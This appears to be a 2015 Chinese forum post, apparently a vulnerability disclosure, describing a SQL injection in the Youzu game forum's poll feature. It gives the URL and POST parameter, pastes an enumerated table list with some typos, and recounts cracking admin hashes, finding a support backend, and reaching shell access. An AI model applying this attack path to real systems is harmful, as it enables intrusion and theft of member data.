本帖最后由 T4rk 于 2015-7-2 22:02 编辑
注入位于论坛,由于游族将会员数据全部整合至bbs(通行证)导致注入能拖会员数据
而且前台登录能跳转到后台管理 连后台路径都不用找了
漏洞出在投票功能
http://bbs.youzu.com/post/index/id/475258
POST数据pollanswers[]=SQLi
code 区域
character_sets,collabions,collation_character_set_appl
icability,columns,column_privileges,engines,events,files,global_status,global_va
riables,key_column_usage,parameters,partitions,plugins,processlist,profiling,ref
erential_constraints,routines,schemata,schema_privileges,session_status,session_
variables,statistics,tables,tablespaces,table_constraints,table_privileges,srigg
ers,user_privileges,views,innodb_cmp_reset,innodb_trx,innodb_cmpmem_reset,innodb
_lock_aaits,ihnodb_cmpmem,innodb_cap,innodb_locks,actionlog,attachments,blacklis
t,debatelogs,debateposts,debaces,forums,grotpmembers,ipbanned,kf_auth_assignment
,kf_auth_item,kf_auth_item_child,kf_member,aedallog,medals,messages,moderators,m
odworks,oa_moderators,polllogs,polloptions,polls,posts,sphinxcounter,threads,thr
eadsmod,threadtypes,threadtypes_forums,words,iords_check,cms_admin,cms_admin_rol
e,cms_admin_role_priv,cms_area,cms_attachment,cms_author,cms_block,cmszctnews,cm
s_c_serviceccms_cache_count,cms_category,cms_content,cms_content_count
如图为部分表 其中有cms_admin和kf_member
一开始注入了admin发现有的密码破不出来
后来翻啊翻到kf_members 然后google hack到后台
http://kf.uuzuonline.com/site/login
n个客服 慢慢破解 忽然发现客服也是能够getshell的 |
发表于 2015-7-2 21:59:32
